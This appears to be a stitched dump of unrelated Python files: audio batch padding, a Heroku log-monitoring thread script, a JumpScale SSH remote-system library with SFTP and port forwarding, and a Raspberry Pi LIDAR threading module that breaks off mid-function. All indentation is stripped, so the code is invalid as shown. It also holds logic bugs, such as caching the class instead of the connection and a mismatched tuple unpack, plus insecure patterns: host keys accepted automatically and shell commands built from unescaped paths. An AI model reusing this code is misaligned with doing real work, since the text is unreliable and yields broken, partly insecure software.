return new_batch
else:
new_batch = []
for b in batch:
x, c, g, l = b
x = audio.trim(x)
if max_time_steps is not None and len(x) > max_time_steps:
start = np.random.randint(0, len(c) - max_time_steps)
x = x[start: start + max_time_steps]
new_batch.append((x, c, g, l))
return new_batch
def _assert_ready_for_upsample(self, x, c):
assert len(x) % len(c) == 0 and len(x) // len(c) == audio.get_hop_size(self._hparams)
def _pad_inputs(x, maxlen):
return np.pad(x, [(0, maxlen - len(x)), (0, 0)], mode='constant', constant_values=_pad)
def _pad_targets(x, maxlen):
return np.pad(x, (0, maxlen - len(x)), mode='constant', constant_values=_pad)
def _round_up(x, multiple):
remainder = x % multiple
return x if remainder == 0 else x + multiple - remainder
def _ensure_divisible(length, divisible_by=256, lower=True):
if length % divisible_by == 0:
return length
if lower:
return length - length % divisible_by
else:
return length + (divisible_by - length % divisible_by)
|
monitor.py
|
import sys
import time
import logging
import threading
import traceback
import load_django
from django.conf import settings
from utils.heroku import HerokuInterface
from utils.parser import parse
from utils.rule_helper import fetch_rules
def eprint(*args, **kwargs):
print(*args, file=sys.stderr, **kwargs)
def sentinal():
fetch_rules()
logging.info("Sentinal thread run. Total thread count: {}".format(threading.active_count()))
logging.debug(threading.enumerate())
# Get all currently active threads. This will include all the logging threads
# and two additional threads:
# - Main Thread in stopped state,
# - and this (sentinal) Timer Thread in running state
active_threads = [th.name for th in threading.enumerate()]
for logsrc in list(settings.RULES.keys()):
if logsrc not in active_threads:
# Log source not present from the thread list
# Creating the missing thread
start_thread(logsrc)
threading.Timer(settings.SENTINAL_THREAD_PERIOD, sentinal).start()
def stream_logs(app_name, source, dyno):
while True:
# Main Thread Loop
try:
for line in HerokuInterface().stream_log(app_name=app_name, source=source, dyno=dyno, timeout=100):
# Search for the required keywords in this line
logging.debug(line.decode('utf-8'))
exit = parse(line.decode('utf-8'), app_name, source, dyno)
if exit:
break
root = app_name + settings.SEPERATOR + source + settings.SEPERATOR + dyno
exit = True if root not in settings.RULES else False
if exit:
break
except Exception:
logging.error(traceback.format_exc())
# TODO: Handle specific exceptions here
# Cooling period in case of errors
time.sleep(1)
logging.info("Stopping log thread: {}:{}:{}".format(app_name, source, dyno))
def start_thread(logsrc):
parts = logsrc.split(settings.SEPERATOR)
if len(parts) != 3:
logging.error("Invalid Rule: {}".format(logsrc))
return
t = threading.Thread(target=stream_logs, args=(parts[0], parts[1], parts[2]), name=logsrc)
t.start()
logging.info("Started log thread: {}".format(logsrc))
if __name__ == '__main__':
logging.info("Starting Dyno Monitor " + settings.ENVIRONMENT)
threading.Timer(settings.SENTINAL_THREAD_PERIOD, sentinal).start()
if not settings.HEROKU_API_KEY:
logging.error("Please specify HEROKU_API_KEY in the environment. Exiting Dyno Monitor")
sys.exit(0)
try:
# List all seperate log sources and create a thread for each
for logsrc in list(settings.RULES.keys()):
start_thread(logsrc)
except KeyboardInterrupt:
eprint('\nExiting by user request.\n')
except Exception:
traceback.print_exc(file=sys.stdout)
sys.exit(0)
|
RemoteSystem.py
|
from JumpScale import j
# This extension is available at j.remote.system
import warnings
warnings.filterwarnings('ignore', r'.*sha.*')
try:
import paramiko
except:
try:
j.system.platform.ubuntu.install("python-paramiko")
except Exception as e:
print "Could not install python-paramiko, this only works on ubuntu, please install it."
import paramiko
import os
import socket
from JumpScale import j
import signal
import SocketServer
import select
import threading
import re
import signal
class InvalidIpAddressError(ValueError):
pass
class RemoteSystemNotReachableError(RuntimeError):
pass
class RemoteSystemAuthenticationError(RuntimeError):
pass
class Exceptions(object):
RemoteSystemNotReachableError = RemoteSystemNotReachableError
RemoteSystemAuthenticationError = RemoteSystemAuthenticationError
InvalidIpAddressError = InvalidIpAddressError
class RemoteSystem(object):
name = "j.remote.system"
exceptions = Exceptions
def __init__(self):
self.connections={}
def connect(self, ip, login="", password="", timeout=120.0, port=22):
"""Creates a connection object to a remote system via ssh.
@param ip: Ipaddress of the remote system
@type ip: string
@param login: Username used for login on remote system
@type login: string
@param password: Password used for login on remote system
@type password: string
@param timeout: Timeout for the SSH session
@type timeout: float
@rtype: RemoteSystemConnection
@return: A connection object to the remote system
@raise RemoteSystemNotReachableError: An error occurred while connecting to the remote system
@raise RemoteSystemAuthenticationError: Could not authenticate to the remote system
@raise socket.error: Unhandeld network error
"""
# if not j.basetype.ipaddress.check(ip):
# raise InvalidIpAddressError("IP address is not a valid IPv4 address")
key="%s_%s_%s_%s"%(ip,login,password,port)
if self.connections.has_key(key):
return self.connections[key]
try:
remoteConnection = RemoteSystemConnection(ip, login, password, timeout, port)
except paramiko.AuthenticationException as authEx:
raise RemoteSystemAuthenticationError(authEx)
except paramiko.SSHException as sshEx:
raise RemoteSystemNotReachableError(sshEx)
except socket.timeout as e:
raise RemoteSystemNotReachableError(e)
except socket.error as e:
reraise = False
try:
if e[0] == 146:
raise RemoteSystemNotReachableError(e[1])
else:
raise
except IndexError:
reraise = True
if reraise:
raise
self.connections[key]=RemoteSystem
return remoteConnection
class RemoteSystemConnection(object):
def __init__(self, ip, login="", password="", timeout=120, port=22):
self._closed = False
self._ipaddress = ip
self._port = port
self._client = paramiko.SSHClient()
self._client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
if password=="":
self._client.connect(hostname=ip, timeout=timeout,port=port, allow_agent=True, look_for_keys=True)
else:
self._client.connect(ip, username=login, password=password, timeout=timeout, port=port)
self._process = None
self._fs = None
self._portforward = None
def close(self):
"""Closes the connection to the remote system"""
self._client.close()
self._closed = True
def __getattribute__(self, name):
if object.__getattribute__(self, '_closed'):
raise RuntimeError('There is no active connection.')
return object.__getattribute__(self, name)
def _getProcess(self):
if not self._process:
self._process = RemoteSystemProcess(self._client)
return self._process
def _getFs(self):
if not self._fs:
self._fs = RemoteSystemFS(self._client)
return self._fs
def _getIpAddress(self):
return self._ipaddress
def _getPortForward(self):
if not self._portforward:
self._portforward = RemoteSystemPortForward(self._client, self._getProcess())
return self._portforward
process = property(fget=_getProcess)
fs = property(fget=_getFs)
ipaddress = property(fget=_getIpAddress, doc="IP address of the machine you are connected to")
portforward = property(fget=_getPortForward, doc="Executes remote and local port forwarding using the connecting machine as ssh server")
class _remoteSystemObject(object):
def __init__(self, connection, ipaddress=None):
if not isinstance(connection, paramiko.SSHClient):
raise TypeError('The connection parameter is not of type paramiko.SSHClient')
self._connection = connection
self._ipaddress = ipaddress or connection.get_transport().sock.getpeername()[0]
class RemoteSystemProcess(_remoteSystemObject):
def _execute_common(self, command, dieOnNonZeroExitCode=True, tostdout=True):
"""
only works on all platforms
return a tuple of (exitcode, stdout, stderr)
Execute a command on the SSH server. Wait till output done.
@raise SSHException: if the server fails to execute the command
"""
j.logger.log("Execute ssh command %s on %s" % (command, self._ipaddress))
#channel = self._connection.get_transport().open_session()
# ipshell()
# stdin, channelFileStdOut, channelFileStdErr=self._connection.exec_command(command)
# Code stolen from self._connection.exec_command(command), it identitical
bufsize = -1
chan = self._connection.get_transport().open_session()
chan.exec_command(command)
channelFileStdin = chan.makefile('wb', bufsize)
channelFileStdOut = chan.makefile('rb', bufsize)
channelFileStdErr = chan.makefile_stderr('rb', bufsize)
# return stdin, stdout, stderr
myOut = ""
myErr = ""
while (not channelFileStdOut.channel.eof_received) or (not channelFileStdErr.channel.eof_received):
if channelFileStdOut.channel.recv_ready():
tmp = (channelFileStdOut.channel.recv(1024))
j.logger.log("ssh %s out:%s" % (self._ipaddress, tmp), 3)
if tostdout:
print tmp.strip()
myOut += tmp
if channelFileStdErr.channel.recv_stderr_ready():
tmp = (channelFileStdErr.channel.recv_stderr(1024))
j.logger.log("ssh %s err:%s" % (self._ipaddress, tmp), 4)
myErr += tmp
tmp = channelFileStdOut.read()
j.logger.log("ssh %s out:%s" % (self._ipaddress, tmp), 3)
myOut += tmp
tmp = channelFileStdErr.read()
j.logger.log("ssh %s err:%s" % (self._ipaddress, tmp), 4)
myErr += tmp
exitcode = chan.recv_exit_status()
# print 'Output:' + myOut
# print 'Error:' + myErr
# print 'ExitCode:' + str(exitcode)
# Only die if exitcode != 0, error != '' is not enough to conclude that the process went wrong because it may only be warnings!
if dieOnNonZeroExitCode and exitcode != 0:
raise RuntimeError("Process terminated with non 0 exitcode, got exitcode %s.\nout:%s\nerror:%s" % (str(exitcode), myOut, myErr))
return exitcode, myOut, myErr
# Todo tomorow refactor other methods to use this one
# For now don't break code
def execute(self, command, dieOnNonZeroExitCode=False, outputToStdout=True, loglevel=5, timeout=None):
"""Executes a command, returns the exitcode and the output
@param command: command to execute
@type command: string
@param dieOnNonZeroExitCode: die if got non zero exitcode
@type dieOnNonZeroExitCode: bool
@param outputToStdout
@param timeout: seconds to wait for a pending read/write operation. Infinity if omitted
@type timeout: float
@param withError: If true the error is also returned
@type timeout: bool
@rtype: number
@return: represents the exitcode plus the output and error output (if enabled by withError) of the executed command. If exitcode is not zero then the executed command returned with errors
"""
#@Todo: Timeout, outputToStdout, loglevel not used
# are they usefull are simply there for backwards compatibility?
if j.system.platformtype.has_parent("unix"):
exitcode, output, error = self._executeUnix(command, dieOnNonZeroExitCode)
else:
exitcode, output, error = self._execute_common(command, dieOnNonZeroExitCode, tostdout=outputToStdout)
return exitcode, output, error
def _executeUnix(self, command, dieOnError=True, timeout=0):
"""
only works for unix
Execute a command on the SSH server. Wait till output done.
@raise SSHException: if the server fails to execute the command
"""
command = command + ' ; echo "***EXITCODE***:$?"'
exitcode, output, error = self._execute_common(command, dieOnNonZeroExitCode=False)
# Not correct, many command issue warnings on stderr!
# if len(error.strip())>0 and dieOnError:
# raise RuntimeError("Could not execute %s on %s, output was \n%s\n%s\n" % (command,self._ipaddress,myOut,myErr))
index = output.find("***EXITCODE***:")
if index == -1: # Something unknown when wrong, we did not recieve all output
exitcode = 1000
# raise RuntimeError("Did not get all output from executing the SSH command %s" % command) ??
else:
lenght = len("***EXITCODE***:")
exitcodestr = output[index + lenght:]
exitcode = int(exitcodestr) # get the exit code
output = output[:index] # clean the output
if dieOnError and exitcode == 1000:
message = "Process terminated with unknown exitcode!!.\nOutput:\n%s.\nError:\n%s\n" % (output, error)
j.errorconditionhandler.raiseOperationalCritical(message, category="system.remote.execute.fatalerror", die=True)
if dieOnError and exitcode != 0:
message = "Process terminated with non 0 exitcode, got exitcode: " + str(exitcode) + " and Error:\n" + error + "\n\nOutput:\n" + output
j.errorconditionhandler.raiseOperationalCritical(message, category="system.remote.execute.fatalerror", die=True)
return exitcode, output, error
def killProcess(self, pid):
"""
Kills a process using sigterm signal
@param pid: process id of the process to be killed
@type pid: int
"""
command = 'kill -%(signum)s %(pid)s' % {'pid': pid, 'signum': signal.SIGTERM}
exitCode, output = self.execute(command, dieOnNonZeroExitCode=False, outputToStdout=False)
if exitCode:
j.console.echo('Failed to execute remote command %s. Reason %s' % (command, output))
return exitCode, output
class RemoteSystemFS(_remoteSystemObject):
def uploadFile(self, localpath, remotepath):
"""Copy a local file (localpath) to the remote system as remotepath
@param localpath: the local file to copy
@type localpath: string
@param remotepath: the destination path on the remote system
@type remotepath: string
@raise TypeError: localpath or remotepath is None
"""
if localpath is None:
raise TypeError('Local path is None in remotesystem.fs.uploadFile')
if remotepath is None:
raise TypeError('Remote path is None in remotesystem.fs.uploadFile')
sf = self._connection.open_sftp()
try:
sf.put(localpath, remotepath)
j.logger.log('Uploaded file %s to %s' % (localpath, remotepath))
finally:
sf.close()
def fileGetContents(self, filename):
"""Read a file and get contents of that file
@param filename: filename to open for reading
@type filename: string
@rtype: string
@return: representing the file contents
@raise TypeError: filename is None
"""
if filename is None:
raise TypeError('File name is None in remotesystem.fs.fileGetContents')
localfile = j.system.fs.getTempFileName()
sf = self._connection.open_sftp()
try:
j.logger.log('Opened SFTP connection to receive file %s' % filename)
try:
sf.get(filename, localfile)
j.logger.log('Saved %s file to %s' % (filename, localfile))
return j.system.fs.fileGetContents(localfile)
finally:
j.system.fs.remove(localfile)
finally:
sf.close()
def writeFile(self, filename, contents):
"""Open a file and write file contents, close file afterwards
@param filename: filename to open for writing
@type filename: string
@param contents: file contents to be written
@type contents: string
@raise TypeError: filename or contents passed are None
@raise ValueError: filename should be a full path
"""
if (filename is None) or (contents is None):
raise TypeError('Passed None parameters in remotesystem.fs.writeFile')
if not filename.startswith('/'):
raise ValueError('Filename should be a full path!')
localfile = j.system.fs.getTempFileName()
try:
# Don't bother copying the file first - we're going to clobber it anyway
j.system.fs.writeFile(localfile, contents)
sf = self._connection.open_sftp()
try:
j.logger.log('Opened SFTP connection to send %s to %s' % (localfile, filename))
sf.put(localfile, filename)
finally:
sf.close()
finally:
j.system.fs.remove(localfile)
def exists(self, path):
"""Check if the specified path exists
@param path: string
@rtype: boolean (True if path refers to an existing path, False for broken symcolic links)
"""
if path is None:
raise TypeError('Path is not passed in remote.system.fs.exists')
sf = self._connection.open_sftp()
try:
sf.stat(path)
except IOError as e:
if e.errno == 2:
j.logger.log('path %s does not exit' % str(path.encode("utf-8")), 8)
return False
else:
raise
except:
raise
finally:
sf.close()
j.logger.log('path %s exists' % str(path.encode("utf-8")), 8)
return True
def isDir(self, path):
"""Check if the specified Directory path exists
@param path: string
@rtype: boolean (True if directory exists)
@raise TypeError: path is empty
"""
if (path is None):
raise TypeError('Directory path is None in system.fs.isDir')
sf = self._connection.open_sftp()
try:
sf.listdir(path)
except IOError as e:
if e.errno == 2:
j.logger.log('path [%s] is not a directory' % path.encode("utf-8"), 8)
return False
else:
raise
finally:
j.logger.log('path [%s] is a directory' % path.encode("utf-8"), 8)
sf.close()
return True
def createDir(self, newdir):
"""Create new Directory
@param newdir: string (Directory path/name)
if newdir was only given as a directory name, the new directory will be created on the default path,
if newdir was given as a complete path with the directory name, the new directory will be created in the specified path
@raise TypeError: newdir parameter is empty
@raise RuntimeError: failed to create directory
"""
j.logger.log('Creating directory if not exists %s' % newdir.encode("utf-8"), 8)
if newdir == '' or newdir == None:
raise TypeError('The newdir-parameter of system.fs.createDir() is None or an empty string.')
try:
if self.exists(newdir):
j.logger.log('Directory trying to create: [%s] already exists' % newdir.encode("utf-8"), 8)
pass
else:
head, tail = os.path.split(newdir)
if head and not self.isDir(head):
self.createDir(head)
if tail:
sf = self._connection.open_sftp()
try:
sf.mkdir(newdir)
finally:
sf.close()
j.logger.log('Created the directory [%s]' % newdir.encode("utf-8"), 8)
except:
raise RuntimeError("Failed to create the directory [%s]" % newdir.encode("utf-8"))
def copyDirTree(self, src, dst, keepsymlinks=False):
"""Recursively copy an entire directory tree rooted at src
The dst directory may already exist; if not,
it will be created as well as missing parent directories
@param src: string (source of directory tree to be copied)
@param dst: string (path directory to be copied to...should not already exist)
@param keepsymlinks: bool (True keeps symlinks instead of copying the content of the file)
@raise TypeError: src or dst is empty
"""
if ((src is None) or (dst is None)):
raise TypeError('Not enough parameters passed in system.fs.copyDirTree to copy directory from %s to %s ' % (src, dst))
stdin, stdout, stderr = self._connection.exec_command('uname -s')
solaris = False
for line in stdout:
if line.startswith('SunOS'):
j.logger.log("Solaris", 5)
solaris = True
if solaris:
if keepsymlinks:
symlinks = '-P'
else:
symlinks = ''
else:
j.logger.log("No solaris", 5)
if keepsymlinks:
symlinks = '-L'
else:
symlinks = '-P'
if self.isDir(src):
if not self.exists(dst):
self.createDir(dst)
cmd = 'cp -rf %s %s/* %s' % (symlinks, src, dst)
j.logger.log("Executing [%s]" % cmd, 5)
self._connection.exec_command(cmd)
else:
raise RuntimeError('Source path %s in remote.system.fs.copyDirTree is not a directory' % src)
def copyDirTreeLocalRemote(self, source, destination="", removeNonRelevantFiles=False):
"""
Recursively copy an entire directory tree rooted at source.
The destination directory may already exist; if not, it will be created
Parameters:
- source: string (source of directory tree to be copied)
- destination: string (path directory to be copied to...should not already exist)
if destination no specified will use same location as source
"""
#@todo check and fix
raise RuntimeError("not fully implemented yet")
if destination == "":
destination = source
dirs = {}
self.executewait("mkdir -p %s" % destination)
ftp = self.getSFtpConnection()
if removeNonRelevantFiles:
self._removeRedundantFiles(source)
files = j.system.fs.listFilesInDir(source, recursive=True)
j.logger.log("Coppy %s files from %s to %s" % (len(files), source, destination), 2)
for filepath in files:
dest = j.system.fs.joinPaths(destination, j.system.fs.pathRemoveDirPart(filepath, source))
destdir = j.system.fs.getDirName(dest)
if destdir not in dirs:
j.logger.log("Create dir %s" % (destdir))
# ftp.mkdir(destdir)
self.executewait("mkdir -p %s" % destdir)
dirs[destdir] = 1
j.logger.log("put %s to %s" % (filepath, dest))
ftp.put(filepath, dest)
def moveFile(self, source, destination):
"""Move a file from source path to destination path
@param source: Source file path
@type source: string
@param destination: Destination path the file should be moved to
@type destination: string
@raise TypeError: source or destin is empty
@raise RuntimeError: Specified source / destination does not exist
@raise RuntimeError: file could not be moved
"""
j.logger.log('Move file from %s to %s' % (source, destination), 6)
if not source or not destination:
raise ValueError("Not enough parameters given to remote.system.fs.moveFile: move from %s, to %s" % (source, destination))
try:
if(self.isFile(source)):
if(self.isDir(destination)):
self.copyFile(source, destination)
self.removeFile(source)
else:
raise RuntimeError("The specified destination path in system.fs.moveFile does not exist: %s" % destination)
else:
raise RuntimeError("The specified source path in system.fs.moveFile does not exist: %s" % source)
except:
raise RuntimeError("File could not be moved...in remote.system.fs.moveFile: from %s to %s " % (source, destination))
def isFile(self, name):
"""Check if the specified file exists for the given path
@param name: string
@rtype: boolean (True if file exists for the given path)
@raise TypeError: name is empty
"""
j.logger.log("isfile:%s" % name, 8)
if (name is None):
raise TypeError('File name is None in remote.system.fs.isFile')
sf = self._connection.open_sftp()
if self.exists(name):
try:
sf.listdir(name)
except IOError as e:
if e.errno == 2:
j.logger.log('[%s] is a file' % name.encode("utf-8"), 8)
return True
else:
raise
finally:
j.logger.log('[%s] is not a file' % name.encode("utf-8"), 8)
sf.close()
return False
def removeFile(self, path):
"""Remove a file
@param path: File path required to be removed
@type path: string
@raise TypeError: path is empty
"""
j.logger.log('Removing file with path: %s' % path, 6)
if not path:
raise TypeError('Not enough parameters passed to system.fs.removeFile: %s' % path)
if(self.exists(path)):
if(self.isFile(path)):
sf = self._connection.open_sftp()
try:
sf.remove(path)
j.logger.log('Done removing file with path: %s' % path)
except:
raise RuntimeError("File with path: %s could not be removed\nDetails: %s" % (path, sys.exc_info()[0]))
finally:
sf.close()
else:
raise RuntimeError("Path: %s is not a file in remote.system.fs.removeFile" % path)
else:
raise RuntimeError("Path: %s does not exist in remote.system.fs.removeFile" % path)
def copyFile(self, fileFrom, fileTo):
"""Copy file
Copies the file from C{fileFrom} to the file or directory C{to}.
If C{to} is a directory, a file with the same basename as C{fileFrom} is
created (or overwritten) in the directory specified.
Permission bits are copied.
@param fileFrom: Source file path name
@type fileFrom: string
@param fileTo: Destination file or folder path name
@type fileTo: string
@raise TypeError: fileFrom or to is empty
@raise RuntimeError: Cannot copy file
"""
j.logger.log("Copy file from %s to %s" % (fileFrom, fileTo), 6)
if not fileFrom or not fileTo:
raise TypeError("No parameters given to system.fs.copyFile from %s, to %s" % (fileFrom, fileTo))
try:
if self.isFile(fileFrom):
cmd = 'cp %s %s' % (fileFrom, fileTo)
self._connection.exec_command(cmd)
else:
raise RuntimeError("Cannot copy file, file: %s does not exist in system.fs.copyFile" % fileFrom)
except:
raise RuntimeError("Failed to copy file from %s to %s" % (fileFrom, fileTo))
def isEmptyDir(self, path):
"""Check whether a directory is empty
@param path: Directory to check
@type path: string"""
if not path:
raise TypeError('Not enough parameters passed to system.fs.isEmptyDir: %s' % path)
if not self.exists(path):
raise RuntimeError('Remote path %s does not exist' % path)
if not self.isDir(path):
raise RuntimeError('Remote path %s is not a directory' % path)
sf = self._connection.open_sftp()
try:
subcount = sf.listdir(path)
if len(subcount) == 0:
return True
else:
return False
finally:
sf.close()
class RemotePortForwardHander(object):
def __init__(self):
# Keep trac of registered forwards forwards[(server_addr, server_port)] = (local_addr, local_port)
self.forwards = {}
def accept(self, channel, xxx_todo_changeme, xxx_todo_changeme1):
(origin_addr, origin_port) = xxx_todo_changeme
(server_addr, server_port) = xxx_todo_changeme1
j.logger.log('port_forward_handler:accept New connection: "%s" %s" "%s" "%s" "%s" "%s"' %
(id(self), id(channel), origin_addr, origin_port, server_addr, server_port))
j.logger.log('port_forward_handler:accept channel.fileno: %s' % channel.fileno())
if (server_addr, server_port) not in self.forwards:
raise ValueError('Failed to handle RemoteForward: No forward registered for %s.\nRegistered forwards: %s' %
(str((server_addr, server_port)), self.forwards))
local_address, local_port = self.forwards[(server_addr, server_port)]
handler_thread = threading.Thread(target=self.handle, args=(channel, local_address, local_port))
handler_thread.setDaemon(True)
handler_thread.start()
def handle(self, channel, local_address, local_port):
'''
Is called from a different thread whenever a forwarded connection arrives.
'''
#j.logger.log('port_forward_handler: New connection: "%s" "%s" "%s" "%s" "%s"' % (id(channel), origin_addr, origin_port, server_addr, server_port))
sock = socket.socket()
try:
sock.connect((local_address, local_port))
except Exception as e:
j.logger.log('port_forward_handler:handle Forwarding request to %s:%d failed: %r' % (local_address, local_port, e), 5)
return
j.logger.log('port_forward_handler:handle Connected! Tunnel open %r -> %r' %
(channel.getpeername(), (local_address, local_port)), 5)
while True:
r, w, x = select.select([sock, channel], [], [])
if sock in r:
data = sock.recv(1024)
if len(data) == 0:
break
channel.send(data)
if channel in r:
data = channel.recv(1024)
if len(data) == 0:
break
sock.send(data)
j.logger.log('port_forward_handler:handle Tunnel closed from %r to %s' % (channel.getpeername(), (local_address, local_port)), 5)
channel.close()
sock.close()
class RemoteSystemPortForward(_remoteSystemObject):
def __init__(self, client, process):
"""
Initialize a Remote Port forward system
"""
_remoteSystemObject.__init__(self, client)
self.process = process
self.remote_forward_handler = RemotePortForwardHander()
def forwardRemotePort(self, serverPort, remoteHost, remotePort, serverHost='', inThread=False):
"""
Set up a reverse forwarding tunnel across an SSH server
@param serverPort: port on server to forward (0 to let server assign port)
@param remoteHost: remote host to forward to
@param remotePort: remote port to forward to
@param serverHost: host on the server to bind to
@param inThread: should we run the forward in a separate thread
@return: Port number used on ther server
@rtype: int
"""
transport = self._connection.get_transport()
serverPort = transport.request_port_forward(serverHost, serverPort, handler=self.remote_forward_handler.accept)
self.remote_forward_handler.forwards[(serverHost, serverPort)] = (remoteHost, remotePort)
if not inThread:
while transport.isAlive():
transport.join(60)
else:
return serverPort
def forwardLocalPort(self, localPort, remoteHost, remotePort, inThread=False):
"""
Set up a forward tunnel across an SSH server
@param localPort: local port to forward
@param remoteHost: remote host to forward to
@param remotePort: remote port to forward to
@param inThread: should we run the forward in a separate thread
"""
transport = self._connection.get_transport()
# this is a little convoluted, but lets me configure things for the Handler
# object. (SocketServer doesn't give Handlers any way to access the outer
# server normally.)
class SubHandler (LocalPortForwardHandler):
chain_host = remoteHost
chain_port = remotePort
ssh_transport = transport
if inThread:
# Start a thread with the server -- that thread will then start one
# more thread for each request
# @todo: Find a way to stop the forward without havinf to stop the process
server_thread = threading.Thread(target=LocalForwardServer(('', localPort), SubHandler).serve_forever)
# Exit the server thread when the main thread terminates
server_thread.setDaemon(True)
server_thread.start()
else:
LocalForwardServer(('', localPort), SubHandler).serve_forever()
def cancelForwardRemotePort(self, serverPort):
"""
Stops any connections from being forwarded using the ssh server on the remote sever port
@param serverPort: the remote port on the server that needs to be canceled
"""
# transport = self._connection.get_transport()
# transport.cancel_port_forward('', serverPort)
pid, output = self.process.getPidForPort(serverPort)
j.logger.log('PID IS %s and output is %s' % (pid, output))
if pid != -1:
exitCode, output = self.process.killProcess(pid)
if exitCode:
raise RuntimeError('Failed to cancel remote port forwarding for remote port %s. Reason: %s' % (serverPort, output))
return True
raise RuntimeError('Failed to cancel remote port forwarding for remote port %s. Reason: %s' % (serverPort, output))
class LocalForwardServer(SocketServer.ThreadingTCPServer):
daemon_threads = True
allow_reuse_address = True
class LocalPortForwardHandler(SocketServer.BaseRequestHandler):
def handle(self):
try:
requestPeername = self.request.getpeername()
chan = self.ssh_transport.open_channel('direct-tcpip',
(self.chain_host, self.chain_port),
requestPeername)
except Exception as e:
j.logger.log('Incoming request to %s:%d failed: %s' % (self.chain_host,
self.chain_port,
repr(e)), 5)
return
if chan is None:
j.logger.log('Incoming request to %s:%d was rejected by the SSH server.' %
(self.chain_host, self.chain_port), 5)
return
j.logger.log('Connected! Tunnel open %r -> %r -> %r' % (requestPeername,
chan.getpeername(), (self.chain_host, self.chain_port)), 5)
while True:
r, w, x = select.select([self.request, chan], [], [])
if self.request in r:
data = self.request.recv(1024)
if len(data) == 0:
break
chan.send(data)
if chan in r:
data = chan.recv(1024)
if len(data) == 0:
break
self.request.send(data)
chan.close()
self.request.close()
j.logger.log('Tunnel closed from %r' % (requestPeername,), 5)
|
raspi_threads.py
|
__author__="Jaimiey Sears, updated by Alex Schendel and Alex Reinemann, 2018"
__copyright__="October 26, 2015"
__version__= 0.50
import queue
import threading
import socket
#from mpl_toolkits.mplot3d import Axes3D
#from matplotlib import cm
import matplotlib.pyplot as plt
import numpy as np
from LidarCommands.utility import *
from LidarCommands.constants import *
import pickle
import time
#from time import sleep
##############################
# PROGRAM MAIN ENTRY POINT #
##############################
def scan(pub, scanDir, scanID):
pub.publish(scan=scanDir, serialID=scanID)
print("Published command to scan forward")
lt = LidarThreads(debug=False)
if lt == None:
return (None, None)
# make the first thread for reading LIDAR data
debugPrint("Starting", ROSTA)
th1_stop = threading.Event()
th1 = threading.Thread(target=lt.produce, args=(lt.dataQueue, th1_stop, pub, scanDir, scanID,), name="data_reader")
debugPrint("Done making thread 1", ROSTA)
# make the second thread to process the LIDAR data
th2_stop = threading.Event()
th2 = threading.Thread(target=lt.consume, args=(lt.dataQueue, th2_stop,), name="cartesian_converter")
debugPrint("done making thread 2", ROSTA)
# start both threads
th1.start()
th2.start()
# close the threads down
while th1.isAlive():
# th1_stop.set()
th1.join(1.0)
debugPrint("producer stopped", ROSTA)
while th2.isAlive():
th2_stop.set()
th2.join(1.0)
debugPrint("consumer stopped", ROSTA)
th1_stop.set()
th2_stop.set()
x = np.asarray(lt.processedDataArrays[0])
y = np.asarray(lt.processedDataArrays[1])
z = np.asarray(lt.processedDataArrays[2])
distance = np.asarray(lt.processedDataArrays[5])
#plt.pcolormesh([z, lt.processedDataArrays[5]]) # Figure out how this works! Also, why z and dist
#plt.colorbar() # need a colorbar to show the intensity scale
#plt.show()
return lt.scanID, z, distance
debugPrint("Done running threads", ROSTA)
debugPrint("exiting with code {}".format(lt.exit()), ROSTA)
debugPrint("queue size at exit: {}".format(lt.dataQueue.qsize()), ROSTA)
raise SystemExit
#####################
## UNIT TEST 1 END ##
#####################
##
# LidarThreads
# class controls threads for gathering LIDAR data
# **Version 0.10 the actual functions are simulated with time.sleep statements**
##
class LidarThreads():
def __init__(self, debug=False):
# don't forget: netsh interface ip set address "Local Area Connection" static 192.168.0.100
global nhokreadings
self.scanID = 0
# controls a number of debug statements which should only print sometimes
self.debug = debug
self.commandOutput = ""
self.dataOutput = ""
self.slitAngle = START_ANGLE
#command to get data from the lidar.
#MD=Distance measurement with continuous scanning
#Parameters:
#Position at the starting step, length 4, name:Start.
#Position at the ending step, length 4, name:End.Units unknown
#Number of group steps, length 2, name:Grouping Units unknown
#Number of scans to skip, length 1, name:Skips
#Number of measurement scans, length 2, name:Scans
#Documentation: https://en.manu-systems.com/HOK-UTM-30LX-EW_communication_protocol.pdf
strStartCommand = 'MD'+'0300'+'0700'+'00'+'0'+'00'+'\n'
strEndCommand = 'QT'+'\n'
self.StartCommand=bytes(strStartCommand, 'ascii')#convert to ascii encoded binary
self.EndCommand=bytes(strEndCommand, 'ascii')
# establish communication with the sensor.
# NOTE, special network settings are required to connect:
# IP: 192.168.1.11, Subnet Mask: 255.255.255.0 (default) Default Gateway: 192.168.0.1
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
self.socket.settimeout(.1)
self.socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
self.socket.connect(("192.168.0.10", 10940))
except socket.timeout as e:
debugPrint("I can't connect. Exiting.", SOCKET_MSG)
return None
# dataQueue is a Queue of strings
# each string representing a slice (scan)
self.dataQueue = queue.Queue()
self.processedDataArrays = []
##
# produce
#
# Description: gets data from the LIDAR unit, puts it into the queue
#
# Parameters:
# dataQueue - queue to submit data to
# stop_event - event to listen to for exit
##
def produce(self, dataQueue, stop_event, pub, scanDir, scanID):
counter = 0
angle = -1
start = time.time()
sID=scanID
for i in range (0,15):#number of slices to scan along y-axis (moving servo motor)
# wait for the Queue to empty
while dataQueue.qsize() > 0:
pass
angle = angle+1
# get the starting theta angle
self.slitAngle = START_ANGLE
# get data from the user
# print "\n>>> Rotate LiDAR to {} degrees".format(ang)
# inp = raw_input(">>> Press enter when ready to make a scan\n")
# if inp == "":
# send scan request to the LIDAR
self.socket.sendall(self.StartCommand)
sID=sID+1
#astr ='MD'+'0180'+'0900'+'00'+'0'+'01'+'\n'
#self.socket.sendall(astr.encode())
#sleep(0.1)
debugPrint("Scanning angle...\n", SOCKET_DATA)
# receive data from the LIDAR
for j in range(0, 100):#number of slices to scan along x-axis (resolution)?
try:
temp = self.socket.recv(3)#receive up to 24 bits of data
#debugPrint("Recv:\n" + temp.decode()[:8], SOCKET_DATA)
data = temp.decode().split("\n")#decode the data and split it by new line
data.reverse()
except socket.timeout as e:
debugPrint("waiting for data", SOCKET_MSG)
break
while data:
try:
str = data.pop()
# put data into our queue for the consumer to use
dataQueue.put((str, angle))
except queue.Full as e:
debugPrint("Data Queue is full.", SOCKET_MSG)
continue
counter += 1.0
end = time.time()
#dataQueue.put('end', angle)
debugPrint("Time difference: {}".format(end-start), ROSTA)
self.socket.sendall(self.EndCommand)
self.scanID = sID
##
# consume
#
# Description: consumes data from the queue
#
# Parameters:
# dataQueue - queue to consume from
# stop_event - the event to watch for quitting.
##
def consume(self, dataQueue, stop_event):
